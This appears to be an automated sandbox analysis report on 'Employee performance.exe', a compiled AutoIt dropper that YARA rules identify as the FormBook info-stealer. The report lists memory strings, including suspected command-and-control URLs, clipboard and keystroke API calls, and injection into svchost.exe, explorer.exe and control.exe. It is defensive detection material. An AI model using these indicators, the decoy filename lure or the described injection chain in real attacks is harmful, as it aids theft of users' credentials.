Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sweatxin.comReferer:
Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.warpateam.com
Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.warpateam.com/lm31/
Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.warpateam.com/lm31/www.ladonbet.xyz
Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.warpateam.comReferer:
Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.webxwhiz.com
Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.webxwhiz.com/lm31/
Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.webxwhiz.com/lm31/www.kovacsking.shop
Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.webxwhiz.comReferer:
Source: explorer.exe, 00000003.00000002.3736285143.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272651654.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2274623728.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000003.00000003.2271623577.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000000.1268404306.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000003.2272651654.0000000008DAF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000003.2272651654.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3735824051.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076210055.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000000.1265667852.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3733334301.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 00000003.00000000.1268404306.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076210055.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272651654.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3735824051.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000003.00000002.3738755686.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1272534932.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000003.00000002.3738755686.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1272534932.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000002.3738755686.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1272534932.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000003.3074286541.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3736459316.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271623577.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000003.00000002.3738755686.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1272534932.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000003.00000002.3741355604.000000001154F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000A.00000002.3732186608.0000000005CBF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000003.00000002.3733334301.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0104EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0104EAFF

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0104ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0104ED6A

Source: C:\Users\user\Desktop\Employee performance.exe

0_2_0104EAFF

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0103AB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0103AB9C

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_01069576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_01069576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Employee performance.exe.15e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Employee performance.exe.15e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Employee performance.exe.15e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Employee performance.exe.15e0000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Employee performance.exe.15e0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Employee performance.exe.15e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Employee performance.exe.15e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Employee performance.exe.15e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.3741729017.00000000118D2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Employee performance.exe PID: 4944, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 4132, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 4644, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: Employee performance.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Employee performance.exe, 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ca6a3d49-2
Source: Employee performance.exe, 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ea6c9655-5
Source: Employee performance.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_854f1631-6
